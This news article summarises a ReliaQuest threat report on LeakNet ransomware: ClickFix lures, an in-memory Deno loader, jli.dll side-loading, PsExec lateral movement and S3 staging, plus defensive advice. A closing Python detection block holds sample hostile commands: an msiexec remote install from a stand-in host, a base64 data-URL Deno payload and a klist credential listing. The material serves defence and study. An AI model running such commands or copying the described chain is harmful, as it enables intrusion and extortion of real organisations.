ReliaQuest has identified new tactics from ransomware operator LeakNet, including a social engineering approach known as ClickFix delivered through compromised websites and a loader built on the Deno runtime that runs largely in memory.
The changes mark a shift in how LeakNet gains an initial foothold in victim environments, along with a new execution method designed to blend in with legitimate developer tooling. ReliaQuest linked the activity to LeakNet “with high confidence” in several recent incidents, citing infrastructure and tactics consistent with previous cases.
LeakNet has averaged about three victims per month, according to the analysis, but the group has been “scaling up and shifting tactics”. The new methods reduce reliance on initial access brokers, which typically sell stolen credentials or pre-built access to compromised systems.
ClickFix lure
ClickFix uses prompts on web pages to persuade a user to run a command, often framed as an error fix or verification step. In the incidents analysed, the lure appeared on legitimate but compromised websites that users reached through normal browsing.
The ClickFix pages prompted users to run a Windows Installer command through msiexec. That command downloaded and ran a loader associated with LeakNet. The delivery appeared opportunistic rather than targeted: any employee who encounters the lure could become an entry point.
ClickFix has also spread rapidly across the threat landscape, facilitating delivery of 59% of the top malware families tracked in 2025, according to the report. This adoption changes what defenders can monitor, since campaigns delivered via compromised sites may not show the same network indicators as attacker-owned infrastructure.
The analysis highlighted detection opportunities after the user action, including suspicious msiexec activity, unusual command lines and outbound connections to external infrastructure.
Deno loader
Alongside the change in initial access, ReliaQuest described a “previously unreported” loader based on Deno, a runtime used to execute JavaScript and TypeScript. LeakNet uses Deno as a “bring your own runtime” approach, installing the legitimate Deno executable and running malicious code inside it rather than deploying a custom loader.
In the observed activity, execution was initiated by Visual Basic Script and PowerShell files with names such as Romeo*.ps1 and Juliet*.vbs. The loader executed a base64-encoded payload in memory via a Deno command line that passed the code as a data URL.
The loader collected basic system details, including username, hostname, total system memory and operating system release. It then created a victim identifier, contacted attacker-controlled infrastructure, selected a command-and-control endpoint and requested a second-stage payload. It also attempted to bind to a local port before entering a polling loop that repeatedly fetched and executed additional code through Deno.
Running code in memory leaves fewer conventional artefacts on disk, which can reduce the effectiveness of file-scanning and signature-based tools. Allowlists and unknown-binary controls can also be less effective when the executable is legitimate and signed. ReliaQuest recommended focusing on behaviour, including unusual Deno usage outside development environments, command-line arguments, parent-child process chains and unexpected network activity.
Repeatable chain
Despite the changing entry points, ReliaQuest observed a consistent post-exploitation chain in every confirmed LeakNet incident. It included jli.dll side-loading into Java in the USOShared directory, PsExec-based lateral movement and payload staging in Amazon S3 buckets.
The DLL side-loading used a legitimate Java process as a carrier. Attackers placed a malicious jli.dll in “C:\ProgramData\USOShared”, a directory associated with Windows Update activity. The technique can appear routine at first glance because it uses familiar processes and locations.
After execution, activity moved to command-and-control communications. Beaconing occurred to multiple domains across incidents while maintaining a consistent URL structure. Lateral movement used PsExec, a legitimate administrative tool. The group also ran “cmd.exe /c klist” to list active authentication credentials on the compromised system before moving to other hosts.
For staging and exfiltration, LeakNet used S3 buckets, which can resemble normal cloud traffic. The report listed indicators including specific domains and S3 bucket addresses associated with the observed activity.

Other routes
ReliaQuest also reported a separate intrusion attempt using Microsoft Teams phishing to persuade a user to download and run an MSI and a VBS file, which then executed a similar Deno-based loader. Attribution for that incident remained inconclusive because it was remediated quickly, though the tooling and approach overlapped.
Defensive steps
The analysis recommended defensive measures focused on both entry and post-exploitation behaviour, including blocking newly registered domains, restricting access to the Win+R Run dialog for non-technical users and limiting PsExec to authorised administrators through policy controls.
Defenders were also urged to look for a combination of signals, including unusual DLL side-loading in non-standard directories, anomalous PsExec usage and unexpected outbound connections to S3 from systems that do not usually communicate with those services.
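The behavioural signals described in the Deno loader and post-exploitation sections above can be expressed as a handful of process and image-load rules. The following is an added illustration, not code from ReliaQuest or the report: it runs five such rules over a constructed set of Sysmon-style events (the file names, parent processes and command lines are assumed samples modelled on the behaviours the report describes, not real telemetry).

```python
import re

# Constructed sample telemetry (not real logs): process-creation and image-load
# events in the shape of Sysmon/EDR output, reduced to the fields the rules need.
SAMPLE_EVENTS = [
    {"type": "process", "parent": "explorer.exe", "image": "msiexec.exe",
     "cmdline": "msiexec /i https://cdn.example.invalid/fix.msi /qn"},
    {"type": "process", "parent": "wscript.exe", "image": "deno.exe",
     "cmdline": 'deno run -A "data:application/typescript;base64,aW1wb3J0IHsgaG9zdG5hbWUgfQ=="'},
    {"type": "imageload", "image": "java.exe",
     "module": r"C:\ProgramData\USOShared\jli.dll"},
    {"type": "process", "parent": "java.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c klist"},
    {"type": "process", "parent": "services.exe", "image": "PSEXESVC.exe",
     "cmdline": "PSEXESVC.exe"},
    # Benign noise the rules should leave alone: a developer running Deno from
    # an editor, and the Windows Installer service starting on its own.
    {"type": "process", "parent": "code.exe", "image": "deno.exe",
     "cmdline": "deno run --allow-net main.ts"},
    {"type": "process", "parent": "services.exe", "image": "msiexec.exe",
     "cmdline": "msiexec /V"},
]

USER_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
SCRIPT_PARENTS = {"wscript.exe", "cscript.exe", "powershell.exe"}
PSEXEC_IMAGES = {"psexec.exe", "psexec64.exe", "psexesvc.exe"}

def classify(ev):
    """Return the names of every rule the event matches (empty list if none)."""
    hits = []
    cmd = ev.get("cmdline", "").lower()
    image = ev.get("image", "").lower()
    parent = ev.get("parent", "").lower()
    if ev["type"] == "process":
        # ClickFix: msiexec launched from a user shell/browser and fetching a package by URL
        if image == "msiexec.exe" and parent in USER_PARENTS and re.search(r"https?://", cmd):
            hits.append("clickfix_msiexec_remote")
        # Deno loader: code supplied inline as a data: URL, or Deno spawned by a script host
        if image == "deno.exe" and ("data:" in cmd or parent in SCRIPT_PARENTS):
            hits.append("deno_inline_payload")
        if image == "cmd.exe" and "klist" in cmd:
            hits.append("klist_ticket_recon")
        if image in PSEXEC_IMAGES:
            hits.append("psexec_activity")
    elif ev["type"] == "imageload":
        module = ev.get("module", "").lower()
        # jli.dll loaded from the USOShared directory rather than a Java install
        if module.startswith(r"c:\programdata\usoshared") and module.endswith("\\jli.dll"):
            hits.append("jli_sideload_usoshared")
    return hits

def scan(events):
    """Map event index to matched rule names for every event that matched at least one rule."""
    results = {}
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            results[i] = hits
    return results
```

Any single rule here fires on legitimate activity too (administrators run klist and PsExec); the report's point is that the combination of these signals on one host, outside a development context, is what stands out.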
“LeakNet is at an inflection point, and the window to get ahead of what comes next is now. The move to self-directed ClickFix delivery, the introduction of a fileless in-memory loader, and a post-exploitation playbook that’s already proven successful across incidents aren’t isolated changes. They’re the building blocks of a group removing constraints on how quickly and broadly it can operate.”
ReliaQuest expects LeakNet to continue to ramp up, while similar fileless execution methods may spread to other threat actors as the technique becomes more widely observed.
